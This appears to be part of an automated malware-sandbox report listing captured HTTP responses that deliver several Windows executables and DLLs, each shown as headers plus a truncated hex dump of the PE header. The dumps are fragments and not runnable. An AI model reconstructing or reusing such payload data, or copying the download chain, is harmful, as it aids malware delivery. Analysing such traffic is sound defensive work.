Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 07:41:15 GMTContent-Type: application/octet-streamContent-Length: 344992Last-Modified: Tue, 01 Oct 2024 13:44:35 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc3-543a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ec 04 00 00 06 00 00 00 00 00 00 ee 0a 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 d7 37 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 0a 05 00 53 00 00 00 00 20 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 1d 05 00 28 26 00 00 00 40 05 00 0c 00 00 00 60 09 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ea 04 00 00 20 00 00 00 ec 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 20 05 00 00 04 00 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0a 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 f7 04 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b3 b7 9b 2b 3e 4a 5d 96 cd ba 79 c2 0f 20 39 99 90 3d f3 1a fb 35 0c de 74 1b b6 a3 53 ed f2 34 3b 67 bd 2f 82 6b 1e 54 00 6c 9c 11 3e 47 50 f6 4f 43 95 42 07 24 d6 82 18 8d 21 9b 78 56 05 f5 d4 58 96 2c 9c 37 df 44 fd 71 52 59 da 96 d8 5c f0 38 09 fd 60 4d 1e 63 f6 1b a9 df 36 80 a4 a1 60 ec 98 16 98 44 36 62 79 f2 0e 65 3e 8b 54 79 8e 09 9b ed 22 6c 5a 44 3b bb 0f 14 36 86 ef d7 c6 b0 46 4e 36 54 c1 5e 3a 9e d1 a2 8d 7a eb ad 5f 18 27 89 01 5f 8f 13 d2 7f c4 cc ab 72 3b 80 1c c7 9e 6e 38 d4 0c 0b 55 61 a0 b3 3c de 44 38 cd b7 d3 34 f1 4f 76 5a d7 32 eb 6a 3b 6f 85 39 e4 e0 df a1 3b f7 61 ac 7d b9 79 81 52 d9 ae 89 04 cf d7 00 5c 8b 85 89 89 f0 c6 a2 60 32 93 66 76 ad 4a 02 43 96 2a 44 87 63 75 96 d5 27 dd 5e 2c 62 a3 ec 1c e5 05 1e 46 5e 49 86 02 65 04 d0 48 ae 4e 21 cd b4 8e ce 98 26 be ee 78 e5 12 44 8f ed c9 aa 02 22 82 91 e0 35 e9 06 e7 c4 bb 7a 03 4a a0 b1 73 45 b9 a6 88 d1 ea f6 c0 48 c
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:41:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:41:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:41:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:41:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:41:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 07:41:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
